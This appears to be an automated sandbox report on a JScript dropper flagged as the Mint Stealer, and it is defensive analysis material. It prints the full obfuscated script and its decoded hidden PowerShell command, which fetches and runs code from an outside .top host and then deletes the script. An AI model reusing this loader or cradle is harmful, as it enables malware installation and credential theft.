                                                                                                            Jan 20, 2025 11:55:52.016015053 CET1236INData Raw: 70 78 5c 30 2f 3b 62 6f 74 74 6f 6d 3a 34 70 78 5c 30 2f 7d 2e 67 62 6d 61 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 2d 31 70 78 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 20 64 61 73 68 65 64 20 64 61 73
                                                                                                            Data Ascii: px\0/;bottom:4px\0/}.gbma{position:relative;top:-1px;border-style:solid dashed dashed;border-color:transparent;border-top-color:#c0c0c0;display:-moz-inline-box;display:inline-block;font-size:0;height:0;line-height:0;width:0;border-width:3px 3p
                                                                                                            Jan 20, 2025 11:55:52.016025066 CET1236INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62
                                                                                                            Data Ascii: !important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/i
                                                                                                            Jan 20, 2025 11:55:52.016036987 CET1236INData Raw: 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 39 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62
                                                                                                            Data Ascii: line-block;line-height:9px;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.
                                                                                                            Jan 20, 2025 11:55:52.020988941 CET1236INData Raw: 78 7d 2e 67 62 6d 74 3a 68 6f 76 65 72 2c 2e 67 62 6d 74 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 65 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 6f 75 74 6c 69 6e 65 3a 30 20 73 6f 6c 69 64 20 62 6c 61 63 6b 3b 74 65 78
                                                                                                            Data Ascii: x}.gbmt:hover,.gbmt:focus{background:#eee;cursor:pointer;outline:0 solid black;text-decoration:none !important}.gbm0l,.gbm0l:visited{color:#000 !important;font-weight:bold}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbm


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:05:55:40
                                                                                                            Start date:20/01/2025
                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js"
                                                                                                            Imagebase:0x7ff7efef0000
                                                                                                            File size:170'496 bytes
                                                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000000.00000003.1499672307.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000000.00000003.1500335199.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000000.00000003.1500163574.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000000.00000003.1499012379.0000023BD7E29000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000000.00000003.1497822366.0000023BD9C3B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000000.00000003.1500383727.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000000.00000002.1506269104.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:2
                                                                                                            Start time:05:55:46
                                                                                                            Start date:20/01/2025
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"
                                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:3
                                                                                                            Start time:05:55:46
                                                                                                            Start date:20/01/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Code Analysis

                                                                                                            Call Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            callgraph clusterC0 clusterC2C0 clusterC4C0 clusterC10C4 clusterC24C4 clusterC6C0 clusterC8C6 clusterC12C0 clusterC14C12 clusterC16C12 clusterC18C12 clusterC20C0 clusterC22C20 clusterC26C0 clusterC28C0 clusterC30C0 clusterC32C0 clusterC34C0 clusterC36C0 clusterC38C36 clusterC40C0 E1C0 entry:C0 F3C2 Sleep E1C0->F3C2 F11C10 ExpandEnvironmentStrings E1C0->F11C10 F25C24 Run E1C0->F25C24 F7C6 E1C0->F7C6 F13C12 sh25wWm2Gmp2 E1C0->F13C12 F21C20 KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgc E1C0->F21C20 F27C26 replace E1C0->F27C26 F29C28 apply E1C0->F29C28 F31C30 fromCharCode E1C0->F31C30 F33C32 fromCharCode E1C0->F33C32 F35C34 CreateObject E1C0->F35C34 F41C40 DeleteFile E1C0->F41C40 F5C4 ActiveXObject() F9C8 fromCharCode F7C6->F9C8 F15C14 split F13C12->F15C14 F17C16 push F13C12->F17C16 F19C18 fromCharCode F13C12->F19C18 F23C22 push F21C20->F23C22 F37C36 F39C38 fromCharCode F37C36->F39C38

                                                                                                            Script:

                                                                                                            Code
                                                                                                            0
                                                                                                            WScript.Sleep ( 6000 );
                                                                                                            • Windows Script Host.Sleep(6000) ➔ undefined
                                                                                                            1
                                                                                                            var NIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM = [ 60 + 60 + 0x2, 50 + 50 + 50 + 16, 50 + 0x2 * 0x4, 32 + 16 * 0x2, 150 * 0x2 + 65, 0x4 * 4, 100 + 25 + 110, 0x5 * 11 ];
                                                                                                              2
                                                                                                              var KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgcar = [ 0xf1 + 0xa, 0xd5 + 0xa, 0xc5 + 0xa, 0xd4 + 0xa, 0xcf + 0xa, 0xd6 + 0xa, 0xd2 + 0xa, 0x88 + 0xa, 0xf5 + 0xa, 0xce + 0xa, 0xc3 + 0xa, 0xca + 0xa, 0xca + 0xa ];
                                                                                                                3
                                                                                                                var KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO = new ActiveXObject (
                                                                                                                  4
                                                                                                                  function () {
                                                                                                                  • () ➔ "Wscript.Shell"
                                                                                                                  • () ➔ "Wscript.Shell"
                                                                                                                  5
                                                                                                                  var KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO12sfr = '';
                                                                                                                    6
                                                                                                                    var KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOIld = 0;
                                                                                                                      7
                                                                                                                      while (KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOIld < KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgcar.length )
                                                                                                                        8
                                                                                                                        {
                                                                                                                          9
                                                                                                                          KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO12sfr += String.fromCharCode ( ( KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgcar[KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOIld] - 0xa ) ^ NIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM[1] );
                                                                                                                            10
                                                                                                                            KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOIld += 1;
                                                                                                                              11
                                                                                                                              }
                                                                                                                                12
                                                                                                                                return KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO12sfr;
                                                                                                                                  13
                                                                                                                                  } ( ) ) ;
                                                                                                                                    14
                                                                                                                                    var JSGNOmMElmTVMCHW0dMGLw0vowLMmxZgu0sP7yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxg7uAlKgcsdf = KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO.ExpandEnvironmentStrings ( "%APPDATA%" ) + "\\JW3VUNHU.ps1";
                                                                                                                                    • ExpandEnvironmentStrings("%APPDATA%") ➔ "C:\Users\hubert\AppData\Roaming"
                                                                                                                                    15
                                                                                                                                    var JSGNOmMElmTVMCHW0dMGLw0vowLMmxZgu0sP7 = "72,84,84,80,26,15,15,78,90,89,19,84,86,66,66,23,18,71,19,14,84,79,80,15,17,14,80,72,80,31,83,29,77,73,78,84,83,17,19";
                                                                                                                                      16
                                                                                                                                      function sh25wWm2Gmp2() {
                                                                                                                                      • sh25wWm2Gmp2() ➔ "http://nzy3tvbb72g3.top/1.php?s=mints13"
                                                                                                                                      17
                                                                                                                                      var script1 = JSGNOmMElmTVMCHW0dMGLw0vowLMmxZgu0sP7.split ( ',' );
                                                                                                                                      • "72,84,84,80,26,15,15,78,90,89,19,84,86,66,66,23,18,71,19,14,84,79,80,15,17,14,80,72,80,31,83,29,77,73,78,84,83,17,19".split(",") ➔ 72,84,84,80,26,15,15,78,90,89,19,84,86,66,66,23,18,71,19,14,84,79,80,15,17,14,80,72,80,31,83,29,77,73,78,84,83,17,19
                                                                                                                                      18
                                                                                                                                      var yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxsh25wWm2Gmp2 = [];
                                                                                                                                        19
                                                                                                                                        var JSGNOmMElmTVMCHW0dMGLw0vowLMmxZgu0sP7yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlx = '';
                                                                                                                                          20
                                                                                                                                          for ( var yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxNIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM = 0 ; yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxNIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM < script1.length ; yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxNIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM ++ )
                                                                                                                                            21
                                                                                                                                            {
                                                                                                                                              22
                                                                                                                                              yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxsh25wWm2Gmp2.push ( String.fromCharCode ( script1[yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxNIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM] ^ ( 0xa * 0x3 + 0.5 * 4 ) ) );
                                                                                                                                                23
                                                                                                                                                }
                                                                                                                                                  24
                                                                                                                                                  for ( var yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxNIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM = 0 ; yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxNIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM < yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxsh25wWm2Gmp2.length ; yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxNIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM ++ )
                                                                                                                                                    25
                                                                                                                                                    {
                                                                                                                                                      26
                                                                                                                                                      JSGNOmMElmTVMCHW0dMGLw0vowLMmxZgu0sP7yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlx += yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxsh25wWm2Gmp2[yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxNIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM];
                                                                                                                                                        27
                                                                                                                                                        }
                                                                                                                                                          28
                                                                                                                                                          return JSGNOmMElmTVMCHW0dMGLw0vowLMmxZgu0sP7yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlx;
                                                                                                                                                            29
                                                                                                                                                            }
                                                                                                                                                              30
                                                                                                                                                              var yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxKClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO = [ 0x43 + 0x87, 0x73 + 0x87, 0x62 + 0x87, 0x79 + 0x87, 0x60 + 0x87, 0x64 + 0x87, 0x79 + 0x87, 0x7e + 0x87, 0x77 + 0x87, 0x3e + 0x87, 0x56 + 0x87, 0x79 + 0x87, 0x7c + 0x87, 0x75 + 0x87, 0x43 + 0x87, 0x69 + 0x87, 0x63 + 0x87, 0x64 + 0x87, 0x75 + 0x87, 0x7d + 0x87, 0x5f + 0x87, 0x72 + 0x87, 0x7a + 0x87, 0x75 + 0x87, 0x73 + 0x87, 0x64 + 0x87 ];
                                                                                                                                                                31
                                                                                                                                                                var KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO836hsdfsl = [ 0x11d + 0xbe, 0x102 + 0xbe, 0x11a + 0xbe, 0x108 + 0xbe, 0x11f + 0xbe, 0x11e + 0xbe, 0x105 + 0xbe, 0x108 + 0xbe, 0x101 + 0xbe, 0x101 + 0xbe, 0x14d + 0xbe, 0x140 + 0xbe, 0x103 + 0xbe, 0x102 + 0xbe, 0x11d + 0xbe, 0x11f + 0xbe, 0x102 + 0xbe, 0x10b + 0xbe, 0x104 + 0xbe, 0x101 + 0xbe, 0x108 + 0xbe, 0x14d + 0xbe, 0x140 + 0xbe, 0x108 + 0xbe, 0x115 + 0xbe, 0x108 + 0xbe, 0x10e + 0xbe, 0x118 + 0xbe, 0x119 + 0xbe, 0x104 + 0xbe, 0x102 + 0xbe, 0x103 + 0xbe, 0x11d + 0xbe, 0x102 + 0xbe, 0x101 + 0xbe, 0x104 + 0xbe, 0x10e + 0xbe, 0x114 + 0xbe, 0x14d + 0xbe, 0x10f + 0xbe, 0x114 + 0xbe, 0x11d + 0xbe, 0x10c + 0xbe, 0x11e + 0xbe, 0x11e + 0xbe, 0x14d + 0xbe, 0x140 + 0xbe, 0x13a + 0xbe, 0x104 + 0xbe, 0x103 + 0xbe, 0x109 + 0xbe, 0x102 + 0xbe, 0x11a + 0xbe, 0x13e + 0xbe, 0x119 + 0xbe, 0x114 + 0xbe, 0x101 + 0xbe, 0x108 + 0xbe, 0x14d + 0xbe, 0x105 + 0xbe, 0x104 + 0xbe, 0x109 + 0xbe, 0x109 + 0xbe, 0x108 + 0xbe, 0x103 + 0xbe, 0x14d + 0xbe, 0x140 + 0xbe, 0x12e + 0xbe, 0x14d + 0xbe, 0x14f + 0xbe, 0x14d + 0xbe, 0x10e + 0xbe, 0x118 + 0xbe, 0x11f + 0xbe, 0x101 + 0xbe, 0x14d + 0xbe, 0x138 + 0xbe, 0x13f + 0xbe, 0x121 + 0xbe, 0x14d + 0xbe, 0x111 + 0xbe, 0x104 + 0xbe, 0x108 + 0xbe, 0x115 + 0xbe, 0x14f + 0xbe ];
                                                                                                                                                                  32
                                                                                                                                                                  function KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgc() {
                                                                                                                                                                  • KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgc() ➔ 112,111,119,101,114,115,104,101,108,108,32,45,110,111,112,114,111,102,105,108,101,32,45,101,120,101,99,117,116,105,111,110,112,111,108,105,99,121,32,98,121,112,97,115,115,32,45,87,105,110,100,111,119,83,116,121,108,101,32,104,105,100,100,101,110,32,45,67,32,34,32,99,117,114,108,32,85,82,76,32,124,105,101,120,34
                                                                                                                                                                  33
                                                                                                                                                                  var KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgcfsfer1 = [];
                                                                                                                                                                    34
                                                                                                                                                                    var KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOyUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxasdfrhg = 0;
                                                                                                                                                                      35
                                                                                                                                                                      while (KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOyUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxasdfrhg < KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO836hsdfsl.length )
                                                                                                                                                                        36
                                                                                                                                                                        {
                                                                                                                                                                          37
                                                                                                                                                                          KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgcfsfer1.push ( ( KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO836hsdfsl[KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOyUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxasdfrhg] - 0xbe ) ^ NIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM[4] );
                                                                                                                                                                            38
                                                                                                                                                                            KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOyUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxasdfrhg ++;
                                                                                                                                                                              39
                                                                                                                                                                              }
                                                                                                                                                                                40
                                                                                                                                                                                return KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgcfsfer1;
                                                                                                                                                                                  41
                                                                                                                                                                                  }
                                                                                                                                                                                    42
                                                                                                                                                                                    KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO.Run ( String.fromCharCode.apply ( null, KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgc ( ) ).replace ( "U" + String.fromCharCode ( 0x43 ^ 17 ) + String.fromCharCode ( 0x55 ^ 25 ), sh25wWm2Gmp2 ( ) ) );
                                                                                                                                                                                    • KClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsOg7uAlKgc() ➔ 112,111,119,101,114,115,104,101,108,108,32,45,110,111,112,114,111,102,105,108,101,32,45,101,120,101,99,117,116,105,111,110,112,111,108,105,99,121,32,98,121,112,97,115,115,32,45,87,105,110,100,111,119,83,116,121,108,101,32,104,105,100,100,101,110,32,45,67,32,34,32,99,117,114,108,32,85,82,76,32,124,105,101,120,34
                                                                                                                                                                                    • function fromCharCode().apply(null,112,111,119,101,114,115,104,101,108,108,32,45,110,111,112,114,111,102,105,108,101,32,45,101,120,101,99,117,116,105,111,110,112,111,108,105,99,121,32,98,121,112,97,115,115,32,45,87,105,110,100,111,119,83,116,121,108,101,32,104,105,100,100,101,110,32,45,67,32,34,32,99,117,114,108,32,85,82,76,32,124,105,101,120,34) ➔ "powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl URL |iex""
                                                                                                                                                                                    • sh25wWm2Gmp2() ➔ "http://nzy3tvbb72g3.top/1.php?s=mints13"
                                                                                                                                                                                    • Run("powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"") ➔ 0
                                                                                                                                                                                    43
                                                                                                                                                                                    var g7uAlKgc = WScript.CreateObject (
                                                                                                                                                                                    • Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
                                                                                                                                                                                    44
                                                                                                                                                                                    function () {
                                                                                                                                                                                    • () ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                    • () ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                    45
                                                                                                                                                                                    var Qah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11MQah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11M1 = "";
                                                                                                                                                                                      46
                                                                                                                                                                                      for ( var Qah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11MQah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11M1g7uAlKgc = 0 ; Qah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11MQah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11M1g7uAlKgc < yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxKClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO.length ; Qah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11MQah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11M1g7uAlKgc ++ )
                                                                                                                                                                                        47
                                                                                                                                                                                        {
                                                                                                                                                                                          48
                                                                                                                                                                                          Qah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11MQah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11M1 += String.fromCharCode ( ( yUYzCfLCDKp0TcBHacVINcprLlP846omRP7HjizRXAEBhbDfHpfy2DIrRvvlg5sxlMTde4jGjlxKClzohjGZ3zQUe7EzhfXrHDLYDEPgYBQVGO3WqUtUKeZP9H91ccIjq02ykS5fIKV7Js3sOVUxtOvAVgVaVwJTzacmDWEsO[Qah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11MQah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11M1g7uAlKgc] - 0x87 ) ^ NIpmPnmVeEUJU3hU04U99bCJn5t9yNNVt1yrVPH1flwBB77Qs0r2RXyheLi1zCa6RMkPOPOsrM[5] );
                                                                                                                                                                                            49
                                                                                                                                                                                            }
                                                                                                                                                                                              50
                                                                                                                                                                                              return Qah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11MQah690hBdGtiVxWk06LSgWYmx7ouA0P3TvA11M1;
                                                                                                                                                                                                51
                                                                                                                                                                                                } ( ) ) ;
                                                                                                                                                                                                  52
                                                                                                                                                                                                  g7uAlKgc.DeleteFile ( WScript.ScriptFullName );
                                                                                                                                                                                                  • DeleteFile("C:\Users\hubert\Desktop\FM5vWQHpqe.js") ➔ undefined
                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                    Function 00007FFB4B2B2B95 Relevance: .4, Instructions: 441COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
